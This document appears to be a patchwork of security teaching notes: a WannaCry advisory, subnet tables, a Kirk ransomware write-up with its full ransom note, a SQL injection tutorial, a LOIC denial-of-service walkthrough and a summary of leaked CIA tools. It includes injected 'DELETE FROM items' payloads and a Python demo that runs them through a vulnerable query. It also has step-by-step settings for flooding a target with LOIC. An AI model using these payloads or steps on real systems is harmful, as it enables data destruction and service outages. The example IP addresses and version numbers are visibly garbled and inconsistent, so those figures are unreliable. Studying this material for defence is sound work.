I woke up on the 12th of May, it was my birthday, and I looked on the news feed and saw a burst of articles regarding the WannaCry Ransomware that has swept across the globe.
In the last few days, a new type of malware called Wannacrypt has done worldwide damage. It combines the characteristics of ransomware and a worm and has hit a lot of machines around the world from different enterprises or government organizations:
While everyone’s attention related to this attack has been on the vulnerabilities in Microsoft Windows XP, please pay attention to the following:
The attack works on all versions of Windows if they haven’t been patched since the March patch release!
The malware can only exploit those vulnerabilities once it has already got onto the network. There are reports that it is being spread via email phishing or malicious web sites, but these reports remain unconfirmed.
Please take the following actions immediately:
Make sure all systems on your network are fully patched, particularly servers.
As a precaution, please ask all colleagues at your location to be very careful about opening email attachments and minimise browsing the web while this attack is on-going.
The vulnerabilities are fixed by the security patches from Microsoft listed below, which were released in March 2017; please ensure you have patched your systems:
This video explains how the RSA public key and private key are created to be fully dependent on each other. The first part of the video explains the concepts with paint and colors. The second part contains heavy duty math, which may not be as easily understood:
Watching this video may help you understand the XOR Activity in Section 3.3.
These links detail the Heartbleed bug from 2014. This vulnerability shows that even when data is protected by encryption both in transit and at rest, data that is being processed is not protected: encrypted data has to be decrypted before it can be processed, and it is at that stage that it is exposed.
This is a Netmask Translation Table. It can be used to determine which IPs can be assigned and which cannot.
Netmask          CIDR  Notes
255.255.255.255  /32   Host (single address)
255.255.255.254  /31   Unusable
255.255.255.252  /30   4 IPs with 2 usable
255.255.255.248  /29   8 IPs with 6 usable
255.255.255.240  /28   16 IPs with 14 usable
255.255.255.224  /27   32 IPs with 30 usable
255.255.255.192  /26   64 IPs with 62 usable
255.255.255.128  /25   128 IPs with 126 usable
255.255.255.0    /24   256 IPs with 254 usable ("Class C")
Note: The first and last IP of a block are NOT usable, and the first usable IP is normally assigned to the router. The first IP is the network address; the last IP is the broadcast address.
Each customer will be given their own unique IP block necessary to configure their own network. This unique IP information will be supplied by their Account Manager.
The block below is only an EXAMPLE; do NOT use its IPs. Use the IP numbers supplied by your Account Manager, who should give you all of the following information.
Your IP block:                188.8.131.52/28
Gateway IP address (router):  184.108.40.206
Usable IPs:                   220.127.116.11-46
Subnet mask:                  255.255.255.240
DNS server:                   ns.cais.com 18.104.22.168
Subnetmask Translation Table
This table extends the one above with the binary form of each mask and the prefixes shorter than /24.
Subnetmask       Subnetmask (binary)                  CIDR  Notes
255.255.255.255  11111111.11111111.11111111.11111111  /32   Host (single address)
255.255.255.254  11111111.11111111.11111111.11111110  /31   Unusable
255.255.255.252  11111111.11111111.11111111.11111100  /30   4 IPs with 2 usable
255.255.255.248  11111111.11111111.11111111.11111000  /29   8 IPs with 6 usable
255.255.255.240  11111111.11111111.11111111.11110000  /28   16 IPs with 14 usable
255.255.255.224  11111111.11111111.11111111.11100000  /27   32 IPs with 30 usable
255.255.255.192  11111111.11111111.11111111.11000000  /26   64 IPs with 62 usable
255.255.255.128  11111111.11111111.11111111.10000000  /25   128 IPs with 126 usable
255.255.255.0    11111111.11111111.11111111.00000000  /24   256 IPs with 254 usable
255.255.254.0    11111111.11111111.11111110.00000000  /23
255.255.252.0    11111111.11111111.11111100.00000000  /22
255.255.248.0    11111111.11111111.11111000.00000000  /21
255.255.240.0    11111111.11111111.11110000.00000000  /20
255.255.224.0    11111111.11111111.11100000.00000000  /19
255.255.192.0    11111111.11111111.11000000.00000000  /18
255.255.128.0    11111111.11111111.10000000.00000000  /17
255.255.0.0      11111111.11111111.00000000.00000000  /16
255.254.0.0      11111111.11111110.00000000.00000000  /15
255.252.0.0      11111111.11111100.00000000.00000000  /14
255.248.0.0      11111111.11111000.00000000.00000000  /13
255.240.0.0      11111111.11110000.00000000.00000000  /12
255.224.0.0      11111111.11100000.00000000.00000000  /11
255.192.0.0      11111111.11000000.00000000.00000000  /10
255.128.0.0      11111111.10000000.00000000.00000000  /9
255.0.0.0        11111111.00000000.00000000.00000000  /8
254.0.0.0        11111110.00000000.00000000.00000000  /7
252.0.0.0        11111100.00000000.00000000.00000000  /6
248.0.0.0        11111000.00000000.00000000.00000000  /5
240.0.0.0        11110000.00000000.00000000.00000000  /4
224.0.0.0        11100000.00000000.00000000.00000000  /3
192.0.0.0        11000000.00000000.00000000.00000000  /2
128.0.0.0        10000000.00000000.00000000.00000000  /1
0.0.0.0          00000000.00000000.00000000.00000000  /0
Note: The first and last IP of a block are NOT usable, and the first usable IP is normally assigned to the router. The first IP is the network address; the last IP is the broadcast address.
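The rule behind both tables (mask from prefix length, first address is the network, last is the broadcast, first usable goes to the router) can be checked mechanically. The following is an added example, not part of the original page: it uses Python's standard ipaddress module to describe a block the way the Account Manager hand-over above does, to decide whether a given address may be assigned to a customer machine, and to regenerate the /32 to /24 rows of the table. The block 192.0.2.16/28 is a constructed example from the documentation range, not a real customer allocation; the /31 "Unusable" row is kept as the table states it.

```python
import ipaddress

def netmask_binary(netmask):
    """Dotted-quad mask -> dotted binary, as in the table's second column."""
    return ".".join(format(int(octet), "08b") for octet in netmask.split("."))

def describe_block(cidr):
    """Return the addressing facts for one IPv4 block, following the table's
    conventions: first address = network, last = broadcast, first usable = router."""
    net = ipaddress.ip_network(cidr, strict=False)  # accept a host address inside the block
    total = net.num_addresses
    if net.prefixlen == 32:
        usable = 1                                   # single host, no network/broadcast pair
        first_usable = last_usable = net.network_address
    elif net.prefixlen == 31:
        usable = 0                                   # listed as "Unusable" in the table above
        first_usable = last_usable = None
    else:
        usable = total - 2
        first_usable = net.network_address + 1
        last_usable = net.broadcast_address - 1
    return {
        "netmask": str(net.netmask),
        "netmask_binary": netmask_binary(str(net.netmask)),
        "cidr": "/%d" % net.prefixlen,
        "total": total,
        "usable": usable,
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "gateway": None if first_usable is None else str(first_usable),
        "usable_range": None if first_usable is None else (str(first_usable), str(last_usable)),
    }

def is_assignable(cidr, host):
    """True only if `host` may be given to a customer machine: it must lie inside the
    block and must not be the network, broadcast or gateway (router) address."""
    net = ipaddress.ip_network(cidr, strict=False)
    addr = ipaddress.ip_address(host)
    if addr not in net:
        return False
    if net.prefixlen == 32:
        return addr == net.network_address            # the single host itself
    if net.prefixlen == 31:
        return False                                  # "Unusable" per the table
    reserved = {net.network_address, net.broadcast_address, net.network_address + 1}
    return addr not in reserved

def table_rows(prefixes=range(32, 23, -1)):
    """Regenerate the /32../24 rows (mask, CIDR, total, usable) to cross-check the table."""
    rows = []
    for p in prefixes:
        info = describe_block("0.0.0.0/%d" % p)
        rows.append((info["netmask"], info["cidr"], info["total"], info["usable"]))
    return rows

if __name__ == "__main__":
    # Constructed example block (documentation range), not a real allocation.
    for key, value in describe_block("192.0.2.16/28").items():
        print("%-15s %s" % (key + ":", value))
    print("192.0.2.20 assignable:", is_assignable("192.0.2.16/28", "192.0.2.20"))
```

Running the block prints the hand-over sheet for 192.0.2.16/28: mask 255.255.255.240, 16 addresses of which 14 are usable, network 192.0.2.16, broadcast 192.0.2.31, gateway 192.0.2.17 and usable range 192.0.2.17 to 192.0.2.30. Substitute the block your Account Manager gave you for the constructed one.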
Boldly going where no man has gone before, the Kirk Ransomware brings so much nerdy goodness to the table that it could make anyone in IT interested. We have Star Trek, Low Orbital Ion Cannons, a cryptocurrency payment other than Bitcoin, and a decryptor named Spock! Need I say more?
Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.
At this time there are no known victims of this ransomware and it does not appear to be decryptable. For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.
Kirk Ransomware uses Monero for Ransom Payments
Ever since Monero was released, it has been highly touted as a more secure and anonymous payment system than Bitcoin. This has caused underground criminal sites, like AlphaBay, to accept it as payment and for criminals to mine it using mining Trojans. It was only a matter of time until ransomware developers started requesting it.
For possibly the first time, with the release of Kirk Ransomware, Monero has been introduced as a ransom payment. The problem is that this is only going to confuse victims even more. Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult.
How the Kirk Ransomware Encrypts a Computer
While it is not currently known how the Kirk Ransomware is being distributed, we do know that it is masquerading as the network stress tool called Low Orbital Ion Cannon. The executable is currently named loic_win32.exe. When executed, Kirk Ransomware generates an AES password that will be used to encrypt a victim’s files. This AES key is then encrypted with an embedded RSA-4096 public key and saved in a file called pwd in the same directory as the ransomware executable.
If you plan on paying the ransom for the Kirk Ransomware, you must not delete the pwd file as it contains an encrypted version of your decryption key. Only the ransomware developer can decrypt this file and if a victim wishes to pay the ransom they will be required to send them this file.
Below is the current embedded RSA key used to encrypt the victim’s encryption key.
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
Kirk Ransomware will now display a message box that displays the same slogan as the LOIC network stress tool. This slogan is: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v188.8.131.52”.
At this point, the ransomware infection will begin to scan the C: drive for files that have certain file extensions. At the time of this writing, Kirk Ransomware targets 625 file types, which are listed at the end of the article.
If a matching file is detected, it will encrypt it using the previously created AES encryption key and then append the .kirked extension to the encrypted file’s name. For example, a file called test.jpg would be encrypted and renamed to test.jpg.kirked.
When the ransomware finishes encrypting the files it will drop a ransom note called RANSOM_NOTE.txt in the same folder as the executable. It will also display the ransom note in a window on your desktop. A full version of the ransom note can be seen at the end of the article.
This ransom note tells the victim that they must purchase ~1,100 worth of the Monero currency and send it to the enclosed Monero address. Once a payment is made, the victim must email the pwd file and the payment transaction ID to the email@example.com or firstname.lastname@example.org email addresses to receive the decryptor.
The Spock Decryptor
This wouldn’t be a Star Trek themed ransomware without Spock. The developer agrees, as they have named the decryptor “Spock”; it will be supplied to the victim once a payment is made.
At this time we have not seen a sample of the decryptor, so cannot provide more info regarding it.
As previously said, unfortunately at this time the ransomware does not look like it can be decrypted. For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.
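The article names three file-system artifacts of an infection: files renamed with the appended .kirked extension, the RANSOM_NOTE.txt note next to the executable, and the pwd file holding the RSA-wrapped AES key that must not be deleted. The following is an added triage script, not code from the article or from the malware, that walks a directory tree and collects those artifacts for an incident responder. The sample directory it builds is constructed in a temporary folder to show the layout; the file names follow the article, the file contents are placeholders.

```python
import os
import tempfile

KIRKED_EXT = ".kirked"          # appended to every encrypted file (test.jpg -> test.jpg.kirked)
RANSOM_NOTE = "RANSOM_NOTE.txt"  # dropped in the folder the executable ran from
KEY_FILE = "pwd"                 # the victim's AES key, encrypted with the embedded RSA-4096 key

def find_kirk_indicators(root):
    """Walk `root` and collect the three artifact types the article describes."""
    found = {"encrypted": [], "notes": [], "key_files": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(KIRKED_EXT):
                found["encrypted"].append(path)
            elif name == RANSOM_NOTE:
                found["notes"].append(path)
            elif name == KEY_FILE:
                found["key_files"].append(path)
    return {k: sorted(v) for k, v in found.items()}

def original_name(path):
    """Recover the pre-encryption file name: test.jpg.kirked -> test.jpg."""
    return path[:-len(KIRKED_EXT)] if path.endswith(KIRKED_EXT) else path

def triage(root):
    """Summarise what was found; `preserve` lists the pwd files that must be kept,
    because only the ransomware author can decrypt the key inside them."""
    found = find_kirk_indicators(root)
    return {
        "encrypted_count": len(found["encrypted"]),
        "originals": sorted(os.path.basename(original_name(p)) for p in found["encrypted"]),
        "ransom_note_present": bool(found["notes"]),
        "key_file_present": bool(found["key_files"]),
        "preserve": found["key_files"],
    }

def build_sample_tree():
    """Constructed post-infection layout in a temp dir; contents are placeholders, not malware."""
    root = tempfile.mkdtemp(prefix="kirk_triage_")
    os.makedirs(os.path.join(root, "tools"))
    os.makedirs(os.path.join(root, "docs"))
    sample_files = [
        ("tools/loic_win32.exe", b"placeholder-not-an-executable"),
        ("tools/pwd", b"placeholder-encrypted-key-blob"),
        ("tools/RANSOM_NOTE.txt", b"Oh no! placeholder note"),
        ("docs/test.jpg.kirked", b"placeholder-ciphertext"),
        ("docs/report.docx.kirked", b"placeholder-ciphertext"),
        ("docs/readme.txt", b"untouched file"),
    ]
    for rel, content in sample_files:
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    sample_root = build_sample_tree()
    for key, value in triage(sample_root).items():
        print("%-20s %s" % (key + ":", value))
```

On the constructed tree the summary reports two encrypted files (report.docx and test.jpg), the note, and one pwd file to preserve. Against a real system, point triage() at the drive root and treat the pwd path it returns as evidence to copy before any cleanup.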
oWMKxd, .,lxNKKOo;. :xWXklcc;. ...'.
k lMMNl . ON. :c. ''. ':....
.WXc ;WMMMXNNXKKxdXMM. . .
.NdoK: XMMMMMMMMMMMMMMM;oo; ...;,cxxxll. .
KK:xKKWMMMXNMMMMW; .. :WNKd, .. .'cdOXKXNNNNNWWMMMMMMMW0,
lNMXXMMMMMMMMWWMMWKk, ;0k' .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:.. ..
..,;XMMMMMMMWXWWK0KK: .;. .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO. .,
.kKXMMMMMWkoxolcc;.. .':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN; '.
.MK;kWMMMWWKOc. . ..';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW: .
,MW:,:x0NMMMMWW0x' ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk. ..
oMMN; ;odoccc;c:. ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.
XMMMX, ....';lldkWkodK0loc'. .'lxx0kOKNMMMXo.
'XMMMMMNc .dldXWx. ..,,coOXOkXMMMK,
,. .:dk0KNWMk. ... .kWMK,. ..:c .:.. .0MWMMMMO.
.':x0K0:. .. . . .OWMNNXO:cccdxKXWMW0o0WWMMMM;.
00000000000kdl:,'. ..'o00l 'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.
0000000000000000000Oxl:' .;xKWWx .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl
0000000000000000000000000x;. ..,::,. .ck0KKk' '0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0. .'
0000000000000000000000000000Oxdllc:;,....,'... .cdkOko: ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. 'Kc:,
000000000000000000000000000000000OkkkxdoodxOkoooool .;okOx, .,'...cKMXl'oKWMMMMMMMWWNXN0 'MMc0.
0000OO000000000000000000000000000000000000000kc. .:dk0c ,KNKxdKMMM0;;kMMMMMMMMWNKXO ,kW0xl
OdloxO000000000000000000000000000000000000000000x, .,ll; .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx
lx000000000000000000000000000000000000000000000000l .'.. .'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..
00000000000000000000000000000000000000000000000000O .. ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc',
00000000000000000000000000000000000000000000000000d .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,
:;ok00000000000000000000000000000000000O.;.d00000dc ... .........cONMMMMMMMMMNXXXN0dlddxN.
.dk000000000000000000000000000000000000;ld,.O00kocc .. ...,;::lokKNMMMMMMMMWKOO0OxloocxM:
OO0000000000000000000000000000000000000ol0Koc0xc:ll . ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md
:;,'..;loxk000000000000000000000000000000000lx..loo ,0 .'';lkKKNMMMMMMMMMNOd:;lc:;'..,kWMK
cccldxkkkO00Okdooddxk00000000000000000000000Oc'lddl dK, .':ollokOOOOOOOc'.........lXMMMM,
000000kdoc,....;cldkO0000000000000000000000Okdodddo'K0'. ....... .oKMMMMMM0
_ _____ ____ _ __ ____ _ _ _ ____ ___ __ ____ ___ ____ _____
| |/ /_ _| _ \| |/ / | _ \ / \ | \ | / ___| / _ \| \/ \ \ / / \ | _ \| ____|
| ' / | || |_) | ' / | |_) | / _ \ | \| \___ \| | | | |\/| |\ \ /\ / / _ \ | |_) | _|
| . \ | || _ <| . \ | _ < / ___ \| |\ |___) | |_| | | | | \ V V / ___ \| _ <| |___
|_|\_\___|_| \_\_|\_\ |_| \_\/_/ \_\_| \_|____/ \___/|_| |_| \_/\_/_/ \_\_| \_\_____|
Oh no! The Kirk ransomware has encrypted your files!
> ! IMPORTANT ! READ CAREFULLY:
Your computer has fallen victim to the Kirk malware and important files have been encrypted - locked
up so they don't work. This may have broken some software, including games, office suites etc.
Here's a list of some the file extensions that were targetted:
.3g2 .rar .jar .cgi .class .jtd .potx .xex .dds
.3gp .jpg .csv .pl .cd .jtt .potm .tiger .ff
.asf .jpeg .psd .com .java .hwp .sda .lbf .yrp
.asx .png .wav .wsf .swift .602 .sdd .cab .pck
.avi .tiff .ogg .bmp .vb .pdb .sdp .rx3 .t3
.flv .zip .wma .bmp .ods .psw .cgm .epk .ltx
.ai .7z .aif .gif .xlr .xlw .wotreplay.vol .uasset
.m2ts .dif.z .mpa .tif .xls .xlt .rofl .asset .bikey
.mkv .exe .wpl .tiff .xlsx .xlsm .pak .forge .patch
.mov .tar.gz .arj .htm .dot .xltx .big .lng .upk
.mp4 .tar .deb .js .docm .xltm .bik .sii .uax
.mpg .mp3 .pkg .jsp .dotx .xlsb .xtbl .litemod .mdl
.mpeg .sh .db .php .dotm .wk1 .unity3d .vef .lvl
mpeg4 .c .dbf .xhtml .wpd .wks .capx .dat .qst
.rm .cpp .sav .cfm .wps .123 .ttarch .papa .ddv
.swf .h .xml .rss .rtf .sdc .iwi .psark .pta
.vob .mov .html .key .sdw .slk .rgss3a .ydk
.wmv .gif .aiml .odp .sgl .pxl .gblorb .mpq
.doc .txt .apk .pps .vor .wb2 .xwm .wtf
.docx .py .bat .ppt .uot .pot .j2e .bsa
.pdf .pyc .bin .pptx .uof .pptm .mpk .re4
There are an additional 441 file extensions that are targetted. They are mostly to do with games.
To get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of
infection will be charged double. Further time penalties are listed below. The time of infection has
Any files with the extensions listed above will now have the extra extension '.kirked', these files
are encrypted using military grade encryption.
In the place you ran this program from, you should find a note (named RANSOM_NOTE.txt) similar to this one.
You will also find a file named 'pwd' - this is your encrypted password file. Although it was
generated by your computer, you have no way of ever decrypting it. This is due to the security
of both the way it was generated and the way it was encrypted. Your files were encrypted using
____ ____ ___ ____ _ __ _____ ___ _____ _ _ _____ ____ _____ ____ ____ _ _ _____ _
/ ___|| _ \ / _ \ / ___| |/ / |_ _/ _ \ |_ _| | | | ____| | _ \| ____/ ___| / ___| | | | ____| |
\___ \| |_) | | | | | | ' / | || | | | | | | |_| | _| | |_) | _| \___ \| | | | | | _| | |
___) | __/| |_| | |___| . \ | || |_| | | | | _ | |___ | _ <| |___ ___) | |___| |_| | |___|_|
|____/|_| \___/ \____|_|\_\ |_| \___/ |_| |_| |_|_____| |_| \_\_____|____/ \____|\___/|_____(_)
"Logic, motherfucker." ~ Spock.
Decrypting your files is easy. Take a deep breath and follow the steps below.
1 ) Make the proper payment.
Payments are made in Monero. This is a crypto-currency, like bitcoin.
You can buy Monero, and send it, from the same places you can any other
crypto-currency. If you're still unsure, google 'bitcoin exchange'.
Sign up at one of these exchange sites and send the payment to the address below.
Make note of the payment / transaction ID, or make one up if you have the option.
Payment Address (Monero Wallet):
Days : Monero : Offer Expires
0-2 : 50 : 03/18/17 15:32:14
3-7 : 100 : 03/23/17 15:32:14
8-14 : 200 : 03/30/17 15:32:14
15-30 : 500 : 04/15/17 15:32:14
Note: In 31 days your password decryption key gets permanently deleted.
You then have no way to ever retrieve your files. So pay now.
2 ) Email us.
Send your pwd file as an email attachment to one of the email addresses below.
Include the payment ID from step 1.
Active email addresses:
3 ) Decrypt your files.
You will recieve your decrypted password file and a program called 'Spock'.
Download these both to the same place and run Spock.
Spock reads in your decrypted password file and uses it to decrypt all of the
affected files on your computer.
> IMPORTANT !
The password is unique to this infection.
Using an old password or one from another machine will result in corrupted files.
Corrupted files cannot be retrieved.
Don't fuck around.
4 ) Breathe.
_ _____ _______ _ ___ _ _ ____
| | |_ _\ \ / / ____| | | / _ \| \ | |/ ___|
| | | | \ \ / /| _| | | | | | | \| | | _
| |___ | | \ V / | |___ | |__| |_| | |\ | |_| |
|_____|___| \_/ |_____| |_____\___/|_| \_|\____|
_ _ _ ____ ____ ____ ___ ____ ____ _____ ____
/ \ | \ | | _ \ | _ \| _ \ / _ \/ ___|| _ \| ____| _ \
/ _ \ | \| | | | | | |_) | |_) | | | \___ \| |_) | _| | |_) |
/ ___ \| |\ | |_| | | __/| _ <| |_| |___) | __/| |___| _ <
/_/ \_\_| \_|____/ |_| |_| \_\\___/|____/|_| |_____|_| \_\
In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website – which will include the following:
SQL injection has been around for at least 20 years, but it is no less powerful or dangerous than any other attack we have covered so far. It is designed to exploit flaws in a website or web application. The attack works by inserting code into an existing line of code prior to its being executed by a database. If SQL injection is successful, attackers can cause their own code to run. In the real world this attack has proven dangerous because many developers are either not aware of the threat or don’t understand its seriousness. Developers should be aware that:
SQL injection is typically a result of flaws in the web application or website and is not an issue with the database.
SQL injection is at the source of many of the high-level or well-known attacks on the Internet.
The goal of attacks of this type is to submit commands through a web application to a database in order to retrieve or manipulate data.
The usual cause of this type of flaw is improper or absent input validation, which allows code to pass unimpeded to the database without being verified.
SQL Attacks in Action
In 2011, Sony Corporation was the victim of a SQL injection that compromised a multitude of accounts (estimated to be over one million e-mails, usernames, and passwords). The FBI revealed that a minimum of 100,000 records, including Social Security numbers of current and former federal employees, were compromised. Additionally, 2,800 of the records obtained included bank account numbers. When investigating this attack, the FBI revealed that not only the DoE and the Army were impacted; NASA, the U.S. Missile Defense Agency, and the Environmental Protection Agency were also affected. Details of these attacks have not been fully released as of this writing.
SQL injection is achieved through the insertion of characters into existing SQL commands with the intention of altering the intended behavior. The following example illustrates SQL injection in action and how it is carried out. The example also reveals the impact of altering the existing values and structure of a SQL query.
In the following example, an attacker logged in as the user link supplies the string ‘name’; DELETE FROM items; -- as the itemName value, where the original code expected only a plain item name after the = sign of the WHERE clause. Once that string is inserted into the existing SQL command, the query becomes the following two queries:
SELECT * FROM items
WHERE owner = 'link'
AND itemname = 'name';
DELETE FROM items;--
Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.
If an attacker enters the string ‘name’; DELETE FROM items; SELECT * FROM items WHERE ‘a’ = ‘a’, the following three valid statements will be created:
SELECT * FROM items
WHERE owner = 'link'
AND itemname = 'name';
DELETE FROM items;
SELECT * FROM items WHERE 'a' = 'a';
A good way to prevent SQL injection attacks is input validation, which ensures that only approved characters are accepted. Use whitelists, which enumerate the characters that are safe, and blacklists, which enumerate the characters that are unsafe.
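The two queries above differ only in how the item name reaches the database. The following is an added example, not part of the original text, written in Python against an in-memory SQLite table: one lookup builds the SQL by string concatenation and runs it with executescript(), which executes every semicolon-separated statement and so reproduces the batch execution described above; the other passes the same input as a bound parameter, which is the fix the text's input-validation advice should sit in front of. The injected value is the three-statement string from the second example above; the table rows and the whitelist pattern are constructed for the demonstration.

```python
import re
import sqlite3

# The injected itemName from the text (constructed test input, not live data).
INJECTED_ITEMNAME = "name'; DELETE FROM items; SELECT * FROM items WHERE 'a' = 'a"

def make_db():
    """In-memory items table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("link", "sword"), ("link", "shield"), ("zelda", "harp")])
    conn.commit()
    return conn

def count_items(conn):
    return conn.execute("SELECT COUNT(*) FROM items").fetchone()[0]

def lookup_vulnerable(conn, owner, itemname):
    """The input is spliced into the SQL text, so quotes and semicolons in it become
    SQL syntax. executescript() runs each ';'-separated statement in turn (batch
    execution), so the smuggled DELETE runs alongside the intended SELECT."""
    sql = "SELECT * FROM items WHERE owner = '%s' AND itemname = '%s';" % (owner, itemname)
    conn.executescript(sql)
    return sql   # returned only so a caller can see the three statements that ran

def lookup_safe(conn, owner, itemname):
    """Parameterised query: the values travel separately from the SQL text, so the
    injected string is compared literally against itemname and matches nothing."""
    return conn.execute("SELECT * FROM items WHERE owner = ? AND itemname = ?",
                        (owner, itemname)).fetchall()

# Whitelist validation as the text recommends: only the characters an item name
# legitimately needs, checked before the value reaches the database at all.
ITEMNAME_ALLOWED = re.compile(r"[A-Za-z0-9_ .-]{1,64}")

def is_valid_itemname(value):
    return ITEMNAME_ALLOWED.fullmatch(value) is not None

def demo():
    """Row count before, after the safe lookup, and after the vulnerable lookup."""
    conn = make_db()
    before = count_items(conn)
    lookup_safe(conn, "link", INJECTED_ITEMNAME)
    after_safe = count_items(conn)
    lookup_vulnerable(conn, "link", INJECTED_ITEMNAME)
    after_vulnerable = count_items(conn)
    return before, after_safe, after_vulnerable

if __name__ == "__main__":
    print("rows (before, after safe, after vulnerable):", demo())
    print("whitelist accepts injected value:", is_valid_itemname(INJECTED_ITEMNAME))
```

demo() returns (3, 3, 0): the parameterised lookup leaves the table intact and simply finds no row named after the injected string, while the concatenated version empties the table. The whitelist rejects the injected value because of the quote and semicolon; keep it as a second layer rather than the only defence, since the parameterised query is what removes the class of bug.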
Results of SQL Injection
What can be accomplished as a result of a SQL injection attack? Well, there are a huge number of possibilities, which are limited only by the configuration of the system and the skill of the attacker.
If an attack is successful, a host of problems could result. Consider the following a sample of the potential outcomes:
Identity spoofing through manipulating databases to insert bogus or misleading information such as e-mails and contact information.
Alteration of prices in e-commerce applications. In this attack, the intruder once again alters data, but does so with the intention of changing price information in order to purchase products or services at a reduced rate.
Alteration of data or outright replacement of data in existing databases with information created by the attacker.
Escalation of privileges to increase the level of access an attacker has to the system, up to and including full administrative access to the operating system.
Denial of service, performed by flooding the server with requests designed to overwhelm the system.
Data extraction and disclosure of all data on the system through the manipulation of the database.
Destruction or corruption of data through rewriting, altering, or other means.
Eliminating or altering transactions that have been or will be committed.
Next up will be all about the anatomy of a SQL Injection and Database vulnerabilities.
Low Orbit Ion Cannon (LOIC) is one of the easiest DDoS tools available, yet its simplicity and remote connection features make it an extremely effective tool. In this guide I will show you just how easy it is to launch a DoS attack using LOIC. For this exercise I used a Windows Server 2008 client with LOIC installed and a Windows 7 target with Wireshark for traffic capture.
1. First, we run the LOIC.exe file. Do not perform an in-depth installation; just run the executable.
2. Once you run the EXE, the program pops up and is ready for a quick configuration. Note that you can target a URL as well as a specific IP address. For our purposes just enter the IP of your Windows 7 box.
3. Click the Lock On button. The IP address shows up as the target; there is no doubt where this traffic is going.
4. Now that you have the IP input and target selected, you can configure a few more details for your attack preferences. For this exercise use port 80, the TCP method, 10000 threads, and the default TCP/UDP message, as shown here:
5. Before you hit the fire button, hop back over to your Windows 7 system and start Wireshark to see the traffic generated by LOIC.
6. Now you can fire your LOIC beam and view the traffic.
CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation). The DDI is one of the five major directorates of the CIA (see this organizational chart of the CIA for more details).
The EDG is responsible for the development, testing and operational support of all backdoors, exploits, malicious payloads, trojans, viruses and any other kind of malware used by the CIA in its covert operations world-wide.
The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell’s 1984, but “Weeping Angel”, developed by the CIA’s Embedded Devices Branch (EDB), which infests smart TVs, transforming them into covert microphones, is surely its most emblematic realization.
The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.
Despite iPhone’s minority share (14.5%) of the global smart phone market in 2016, a specialized unit in the CIA’s Mobile Development Branch produces malware to infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads. CIA’s arsenal includes numerous local and remote “zero days” developed by CIA or obtained from GCHQ, NSA, FBI or purchased from cyber arms contractors such as Baitshop. The disproportionate focus on iOS may be explained by the popularity of the iPhone among social, political, diplomatic and business elites.
These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloackman by hacking the “smart” phones that they run on and collecting audio and message traffic before encryption is applied.
Many of these infection efforts are pulled together by the CIA’s Automated Implant Branch (AIB), which has developed several attack systems for automated infestation and control of CIA malware, such as “Assassin” and “Medusa”.
The CIA has developed automated multi-platform malware attack and control systems covering Windows, Mac OS X, Solaris, Linux and more, such as EDB’s “HIVE” and the related “Cutthroat” and “Swindle” tools, which are described in the examples section below.
CIA ‘hoarded’ vulnerabilities (“zero days”)
In the wake of Edward Snowden’s leaks about the NSA, the U.S. technology industry secured a commitment from the Obama administration that the executive would disclose on an ongoing basis — rather than hoard — serious vulnerabilities, exploits, bugs or “zero days” to Apple, Google, Microsoft, and other US-based manufacturers.
Serious vulnerabilities not disclosed to the manufacturers places huge swathes of the population and critical infrastructure at risk to foreign intelligence or cyber criminals who independently discover or hear rumors of the vulnerability. If the CIA can discover such vulnerabilities so can others.
The U.S. government’s commitment to the Vulnerabilities Equities Process came after significant lobbying by US technology companies, who risk losing their share of the global market over real and perceived hidden vulnerabilities. The government stated that it would disclose all pervasive vulnerabilities discovered after 2010 on an ongoing basis.
“Year Zero” documents show that the CIA breached the Obama administration’s commitments. Many of the vulnerabilities used in the CIA’s cyber arsenal are pervasive and some may already have been found by rival intelligence agencies or cyber criminals.
